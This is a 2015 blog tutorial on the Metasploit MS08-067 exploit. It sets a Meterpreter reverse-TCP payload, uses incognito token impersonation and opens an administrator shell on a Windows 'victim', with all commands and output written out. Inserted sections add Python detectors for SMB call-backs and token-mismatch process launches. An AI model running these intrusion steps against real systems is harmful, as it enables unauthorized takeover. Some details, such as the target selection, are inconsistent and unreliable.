By: Multi Thinker
July 14, 2015

Metasploit: Incognito Attack

Hi there. This is Metasploit part 1. In a recent article, we learned about the basics and a little bit of configuration. Here, we'll be a little more advanced.

Meterpreter

What's Meterpreter? Meterpreter is a DLL injector, mostly used to hijack Windows security. Its set of commands lets us take over the security of Windows and make changes to it or access it.
Points to note:
  • Meterpreter works with TLS
  • Meterpreter can edit Windows features, events, scripts and the shell
  • Meterpreter can use a listener to receive logs/events from the victim, acting as a backdoor

Incognito Attack

As you might imagine, this attack vector works anonymously (it leaves no signs of itself) and can be used to steal a session.

Useful information: you need Windows login / administrator rights; let's assume the target has Windows XP Service Pack 2 installed. We're on the same LAN or we have the IP (in a recent article we learned how to start msfcli / msfconsole / Metasploit). Let's assume you've now opened that. Set the target with RHOST and search for the exploit named "ms08_067_netapi". To use an exploit, we know we need to type:
  use exploit (the full path can be found by typing search)
Next, type:
  msf> use exploit/windows/smb/ms08_067_netapi
It will show you that you're using this exploit:
  msf exploit(ms08_067_netapi) >
Now, you need to see the options and set RHOST, or the configuration we talked about in a recent article:
 msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx
It will become:
 RHOST => xx.xx.xx.xx (this means our RHOST is set up)

Let's Use Payloads

Payloads: Payloads are additional, stand-alone scripts that work in sequence to take over the victim. Metasploit has its own built-in default payloads; we can even use our own. Let's use the meterpreter reverse TCP payload:
 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Hit enter and this will appear, meaning your exploit is set up, too:
 PAYLOAD => windows/meterpreter/reverse_tcp
Next, set up LHOST (the local host the payload connects back to in order to create the session for the attack. Of course, we're LHOST, so we give our own IP):
 msf exploit(ms08_067_netapi) > set LHOST xx.xx.xx.xx
 LHOST => xx.xx.xx.xx
The configurations are complete; let's see the targets/options and what we can do further:
 msf exploit(ms08_067_netapi) > show targets

 Exploit targets:

    Id  Name
    --  ----
    0   Automatic Targeting
    1   Windows 2000 Universal
    2   Windows XP SP0/SP1 Universal
    3   Windows XP SP2 English (NX)
    4   Windows XP SP3 English (NX)
    5   Windows 2003 SP0 Universal
    6   Windows 2003 SP1 English (NO NX)
    7   Windows 2003 SP1 English (NX)
    8   Windows 2003 SP2 English (NO NX)
    9   Windows 2003 SP2 English (NX)
    10  Windows XP SP2 Arabic (NX)
    11  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
 We have to choose the kind of OS we need to exploit/attack. We can use NMAP / ZENMAP to learn that information:
 msf exploit(ms08_067_netapi) > set TARGET 8
 target => 8
Let's exploit:
 msf exploit(ms08_067_netapi) > exploit

 [*] Handler binding to LHOST 0.0.0.0
 [*] Started reverse handler
 [*] Triggering the vulnerability...
 [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
 [*] Sending stage (2650 bytes)
 [*] Sleeping before handling stage...
 [*] Uploading DLL (75787 bytes)...
 [*] Upload completed.
 [*] Meterpreter session 1 opened (xx.xx.xx.xx:xx -> xx.xx.xx.xx:xx)

 meterpreter >
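From the defender's side, the handler output above describes a very specific traffic shape: the ms08_067_netapi exploit arrives over SMB (TCP 445 or 139), and the windows/meterpreter/reverse_tcp payload then opens a brand-new connection from the victim back to LHOST (Metasploit's default LPORT is 4444, but the operator can pick any port). Beyond patching (Microsoft fixed MS08-067 in October 2008) and blocking inbound SMB at the perimeter, a file server that receives SMB from a peer and within seconds initiates an outbound connection to that same peer is worth an alert. The script below is an added example, not part of the original post or of Metasploit; it correlates inbound SMB with a fast outbound call-back over a connection log whose format and sample lines are constructed here for illustration.

```python
"""Correlate inbound SMB with a fast outbound call-back to the same peer.

Added example (not from the original post). The connection-log format and the
sample lines are constructed for this example: each line is
"timestamp direction src_ip src_port dst_ip dst_port" as seen from the server.
"""
from datetime import datetime, timedelta

SMB_PORTS = {139, 445}
CALLBACK_WINDOW = timedelta(seconds=30)

# Constructed sample: 10.0.0.5 is the file server. 10.0.0.7 sends SMB and two
# seconds later the server opens a connection back to it on port 4444 (the
# Metasploit default LPORT; the rule does not depend on that port). 10.0.0.9
# only ever talks SMB, and the outbound HTTP request to 10.0.0.20 is benign.
SAMPLE_LOG = """\
2015-07-14T10:00:01 in  10.0.0.7 49152 10.0.0.5 445
2015-07-14T10:00:02 in  10.0.0.9 50010 10.0.0.5 445
2015-07-14T10:00:03 out 10.0.0.5 1034 10.0.0.7 4444
2015-07-14T10:05:00 out 10.0.0.5 1035 10.0.0.20 80
2015-07-14T10:30:00 in  10.0.0.9 50011 10.0.0.5 445
"""


def parse_log(text):
    """Parse the constructed log format into a list of dict records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, direction, src, sport, dst, dport = line.split()
        records.append({
            "ts": datetime.fromisoformat(ts),
            "dir": direction,
            "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport),
        })
    return records


def find_smb_callbacks(records, window=CALLBACK_WINDOW):
    """Return (peer, smb_time, callback_time, callback_port) for every outbound
    connection to a peer that sent us SMB traffic within `window` before it."""
    last_smb_from = {}  # peer ip -> timestamp of its most recent inbound SMB
    hits = []
    for r in sorted(records, key=lambda r: r["ts"]):
        if r["dir"] == "in" and r["dport"] in SMB_PORTS:
            last_smb_from[r["src"]] = r["ts"]
        elif r["dir"] == "out":
            seen = last_smb_from.get(r["dst"])
            if seen is not None and timedelta(0) <= r["ts"] - seen <= window:
                hits.append((r["dst"], seen, r["ts"], r["dport"]))
    return hits


if __name__ == "__main__":
    for peer, smb_t, cb_t, port in find_smb_callbacks(parse_log(SAMPLE_LOG)):
        print(f"[!] {peer}: inbound SMB at {smb_t.time()}, "
              f"outbound call-back to port {port} at {cb_t.time()}")
```

The rule keys on direction and timing rather than on a port number, so it still fires when the operator changes LPORT; on a real network, feed it the firewall or NetFlow records for hosts that legitimately serve SMB and tune the window to the observed latency.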
Choose incognito
  meterpreter > use incognito
See more options for what we can do in incognito using help:
  meterpreter > help

  Command              Description
  -------              -----------
  add_group_user       Attempt to add a user to a global group with all tokens
  add_localgroup_user  Attempt to add a user to a local group with all tokens
  add_user             Attempt to add a user with all tokens
  impersonate_token    Impersonate specified token
  list_tokens          List tokens available under current user context
  snarf_hashes         -----------
We have to see session/tokens to access our victim. To list those tokens, type:
  meterpreter > list_tokens -u

  Delegation Tokens Available
  ========================================
  NT AUTHORITY\LOCAL SERVICE
  NT AUTHORITY\NETWORK SERVICE
  NT AUTHORITY\SYSTEM
  Thinker\Administrator

  Impersonation Tokens Available
  ========================================
  NT AUTHORITY\ANONYMOUS LOGON
We got the administrator listed. Let's dump it. To impersonate it, we type the command with our victim's machine name and user name, separated by a doubled backslash (the backslash has to be escaped on the Meterpreter command line):
  meterpreter > impersonate_token Thinker\\Administrator
  [+] Delegation token available
  [+] Successfully impersonated user Thinker\Administrator

Let's see what we got here:
  meterpreter > getuid
  Server username: Thinker\Administrator
The last step: we need to start a Windows cmd. For that, type "execute -f cmd.exe -i -t", where -f names the program to run, -i interacts with the new process, and -t runs it with the currently impersonated token. With a shell, we can work through meterpreter and have full access:
  meterpreter > shell
  Process 2804 created.
  Channel 1 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.

  C:\WINDOWS\system32> whoami
  whoami
  Thinker\administrator

  C:\WINDOWS\system32>
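Two host-side traces survive the steps above, and both are cheap to hunt for. First, the vulnerable Server service lives inside an svchost.exe, so the Meterpreter session and the shell it spawns hang off a service host: cmd.exe with svchost.exe as its parent is a lineage a service host has no business producing. Second, incognito's impersonate_token followed by execute -t (or shell, as the whoami output above shows) starts a process under somebody else's token, so the account that created the process and the account it runs as no longer match. The script below is an added example, not part of the original post or of Metasploit; it applies both checks to process-creation records whose layout is constructed for this example (it is modelled loosely on a process-creation audit event carrying creator and target user fields, not on any real Windows event format).

```python
"""Flag shells spawned by service hosts and processes whose token differs
from their creator's.

Added example (not from the original post). The ProcessEvent layout and the
sample events are constructed for this example.
"""
import ntpath
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    ts: str
    parent_image: str
    image: str
    creator_user: str   # account of the process that created this one
    target_user: str    # account the new process actually runs as
    command_line: str


# Constructed sample: one benign launch from an interactive session, then the
# chain from the post: cmd.exe under the Server service's svchost.exe as SYSTEM,
# a second cmd.exe created by SYSTEM but running under the impersonated
# Administrator token, and the whoami that cmd.exe then runs.
SAMPLE_EVENTS = [
    ProcessEvent("10:00:00", r"C:\WINDOWS\explorer.exe",
                 r"C:\WINDOWS\system32\notepad.exe",
                 r"THINKER\Administrator", r"THINKER\Administrator", "notepad.exe"),
    ProcessEvent("10:00:03", r"C:\WINDOWS\system32\svchost.exe",
                 r"C:\WINDOWS\system32\cmd.exe",
                 r"NT AUTHORITY\SYSTEM", r"NT AUTHORITY\SYSTEM", "cmd.exe"),
    ProcessEvent("10:00:09", r"C:\WINDOWS\system32\svchost.exe",
                 r"C:\WINDOWS\system32\cmd.exe",
                 r"NT AUTHORITY\SYSTEM", r"THINKER\Administrator", "cmd.exe"),
    ProcessEvent("10:00:10", r"C:\WINDOWS\system32\cmd.exe",
                 r"C:\WINDOWS\system32\whoami.exe",
                 r"THINKER\Administrator", r"THINKER\Administrator", "whoami"),
]

# Processes that host services and should never be the parent of a shell.
SERVICE_HOSTS = {"svchost.exe", "services.exe", "lsass.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def analyse(events):
    """Return a list of (timestamp, rule, detail) findings, in event order."""
    findings = []
    for e in events:
        parent, child = basename(e.parent_image), basename(e.image)
        if parent in SERVICE_HOSTS and child in SHELLS:
            findings.append((e.ts, "service_host_spawned_shell",
                             f"{parent} -> {child} as {e.target_user}"))
        if e.creator_user.lower() != e.target_user.lower():
            findings.append((e.ts, "token_mismatch",
                             f"{child} created by {e.creator_user} "
                             f"but runs as {e.target_user}"))
    return findings


if __name__ == "__main__":
    for ts, rule, detail in analyse(SAMPLE_EVENTS):
        print(f"[{ts}] {rule}: {detail}")
```

The lineage rule alone already catches the plain `shell` step; the token-mismatch rule is what distinguishes an impersonated session from a service simply running as SYSTEM, and it also flags legitimate runas-style launches, so pair it with an allow-list of the service accounts that are expected to create processes for other users.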
Voila! We're now in the Windows system and have full access to it.

-- Multi Thinker